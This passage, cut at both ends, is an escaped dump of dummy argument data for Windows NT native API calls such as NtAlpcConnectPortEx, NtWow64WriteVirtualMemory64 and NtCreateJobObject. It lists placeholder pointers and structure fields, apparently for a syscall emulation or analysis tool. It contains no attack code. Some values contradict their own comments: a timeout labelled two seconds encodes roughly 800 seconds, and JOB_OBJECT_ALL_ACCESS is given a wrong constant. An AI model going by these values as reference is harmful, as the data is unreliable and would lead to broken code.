\"Pointer to ULONG (dummy pointer, optional return for disposition)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE TransactionHandle (None, default for no transaction)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"CreateOptions (REG_OPTION_NON_VOLATILE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Class (None, default for no class string)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional class string for the key.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Reserved ULONG (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct61\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F003F\",\r\n \"additionalComment\": \"DesiredAccess (KEY_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to HANDLE KeyHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct61\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0070\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQuerySecurityAttributesToken\": {\r\n \"ntFunc\": \"NtQuerySecurityAttributesToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG Length (typical buffer size, e.g. 256 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to output buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd1000\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG NumberOfAttributes (example: 2 attributes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Attributes (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct62\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing attribute name(s)\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE TokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct62\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length in bytes of string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0130\",\r\n \"fieldComment\": \"Pointer to string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtWow64CallFunction64\": {\r\n \"ntFunc\": \"NtWow64CallFunction64\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Optional pointer to ULONG (dummy pointer, may be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to output buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd2000\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG OutputLength (256 bytes typical)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to input buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd3000\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG InputLength (32 bytes typical)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Flags (example: 1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000005\",\r\n \"additionalComment\": \"ULONG FunctionIndex (example: 5)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWow64WriteVirtualMemory64\": {\r\n \"ntFunc\": \"NtWow64WriteVirtualMemory64\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Optional pointer to ULONGLONG (dummy pointer, may be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONGLONG BufferSize (4096 bytes typical)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd4000\"\r\n },\r\n {\r\n \"value\": \"0x00007fff0000\",\r\n \"additionalComment\": \"PVOID64 BaseAddress (typical 64-bit address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcConnectPortEx\": {\r\n \"ntFunc\": \"NtAlpcConnectPortEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER TimeOut (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct63\",\r\n \"structureValueExpectations\": \"Timeout value in 100-nanosecond intervals\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to ALPC_MESSAGE_ATTRIBUTES InMessageAttributes (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"structureRef\": \"struct64\",\r\n \"structureValueExpectations\": \"Attributes for the input message\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to ALPC_MESSAGE_ATTRIBUTES OutMessageAttributes (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"structureRef\": \"struct65\",\r\n \"structureValueExpectations\": \"Attributes for the output message\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to SIZE_T BufferLength (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000200\"\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to PORT_MESSAGE ConnectionMessage (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": \"PORT_MESSAGE\",\r\n \"structureRef\": \"struct66\",\r\n \"structureValueExpectations\": \"Connection message structure\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR ServerSecurityRequirements (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": \"SECURITY_DESCRIPTOR\",\r\n \"structureRef\": \"struct67\",\r\n \"structureValueExpectations\": \"Security descriptor for server requirements\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Flags (example: ALPC_CONNECTFLAG_SYNC_CONNECTION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to ALPC_PORT_ATTRIBUTES PortAttributes (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": \"ALPC_PORT_ATTRIBUTES\",\r\n \"structureRef\": \"struct68\",\r\n \"structureValueExpectations\": \"Port attribute structure\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00f0\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES ClientPortObjectAttributes (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct69\",\r\n \"structureValueExpectations\": \"Object attributes for client port\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0100\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES ConnectionPortObjectAttributes (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct70\",\r\n \"structureValueExpectations\": \"Object attributes for connection port\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0110\",\r\n \"additionalComment\": \"Pointer to HANDLE PortHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct63\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x00000001dcd65000\",\r\n \"fieldComment\": \"Timeout value: 2 seconds in 100-nanosecond intervals\"\r\n }\r\n ]\r\n },\r\n \"struct64\": {\r\n \"type\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"AllocatedAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Example: ALPC_MESSAGE_SECURITY_ATTRIBUTE\"\r\n },\r\n {\r\n \"fieldName\": \"ValidAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Example: ALPC_MESSAGE_SECURITY_ATTRIBUTE\"\r\n }\r\n ]\r\n },\r\n \"struct65\": {\r\n \"type\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"AllocatedAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No attributes allocated\"\r\n },\r\n {\r\n \"fieldName\": \"ValidAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No attributes valid\"\r\n }\r\n ]\r\n },\r\n \"struct66\": {\r\n \"type\": \"PORT_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"u1.Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0040\",\r\n \"fieldComment\": \"Message length\"\r\n },\r\n {\r\n \"fieldName\": \"u1.ZeroInit\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Zero-initialized\"\r\n },\r\n {\r\n \"fieldName\": \"u2.Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type\"\r\n },\r\n {\r\n \"fieldName\": \"u2.DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"No data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99995555\",\r\n \"fieldComment\": \"Dummy process ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Dummy thread ID\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Message ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientViewSize\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No client view\"\r\n }\r\n ]\r\n },\r\n \"struct67\": {\r\n \"type\": \"SECURITY_DESCRIPTOR\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"UCHAR\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"Revision 1\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz1\",\r\n \"fieldType\": \"UCHAR\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x8004\",\r\n \"fieldComment\": \"SE_DACL_PRESENT | SE_SELF_RELATIVE\"\r\n },\r\n {\r\n \"fieldName\": \"Owner\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0xbadd0140\",\r\n \"fieldComment\": \"Pointer to owner SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Group\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0xbadd0150\",\r\n \"fieldComment\": \"Pointer to group SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Sacl\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Dacl\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0xbadd0160\",\r\n \"fieldComment\": \"Pointer to DACL (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct68\": {\r\n \"type\": \"ALPC_PORT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Flags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"ALPC_PORTFLG_ALLOW_LPC_REQUESTS\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQos.Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x0000000c\",\r\n \"fieldComment\": \"SECURITY_QUALITY_OF_SERVICE size\"\r\n },\r\n {\r\n \"fieldName\": \"MaxMessageLength\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"4096 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"MemoryBandwidth\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxPoolUsage\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxSectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxViewSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxTotalSectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"DupObjectTypes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n }\r\n ]\r\n },\r\n \"struct69\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n },\r\n \"struct70\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcImpersonateClientContainerOfPort\": {\r\n \"ntFunc\": \"NtAlpcImpersonateClientContainerOfPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0120\",\r\n \"additionalComment\": \"Pointer to PORT_MESSAGE Message (dummy pointer)\",\r\n \"structurePointer\": \"PORT_MESSAGE\",\r\n \"structureRef\": \"struct71\",\r\n \"structureValueExpectations\": \"Message to impersonate\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct71\": {\r\n \"type\": \"PORT_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"u1.Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0040\",\r\n \"fieldComment\": \"Message length\"\r\n },\r\n {\r\n \"fieldName\": \"u1.ZeroInit\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Zero-initialized\"\r\n },\r\n {\r\n \"fieldName\": \"u2.Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type\"\r\n },\r\n {\r\n \"fieldName\": \"u2.DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"No data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99996666\",\r\n \"fieldComment\": \"Dummy process ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Dummy thread ID\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Message ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientViewSize\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No client view\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAreMappedFilesTheSame\": {\r\n \"ntFunc\": \"NtAreMappedFilesTheSame\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID File2MappedAsFile (None, no file mapped)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID File1MappedAsAnImage (None, no image mapped)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAssignProcessToJobObject\": {\r\n \"ntFunc\": \"NtAssignProcessToJobObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00003333\",\r\n \"additionalComment\": \"HANDLE JobHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateJobSet\": {\r\n \"ntFunc\": \"NtCreateJobSet\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG JobSetCount (1 job in set)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to JOB_SET_ARRAY (dummy pointer)\",\r\n \"structurePointer\": \"JOB_SET_ARRAY\",\r\n \"structureRef\": \"struct72\",\r\n \"structureValueExpectations\": \"Array of JOB_SET_ARRAY structures describing jobs to create.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (0, no special flags)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct72\": {\r\n \"type\": \"JOB_SET_ARRAY\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"JobHandle\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00003333\",\r\n \"fieldComment\": \"Dummy job handle\"\r\n },\r\n {\r\n \"fieldName\": \"MemberLevel\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Member level 1\"\r\n },\r\n {\r\n \"fieldName\": \"Flags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No special flags\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateJobObject\": {\r\n \"ntFunc\": \"NtCreateJobObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct73\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020000\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (JOB_OBJECT_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE JobHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct73\": {\r\n \"type\": 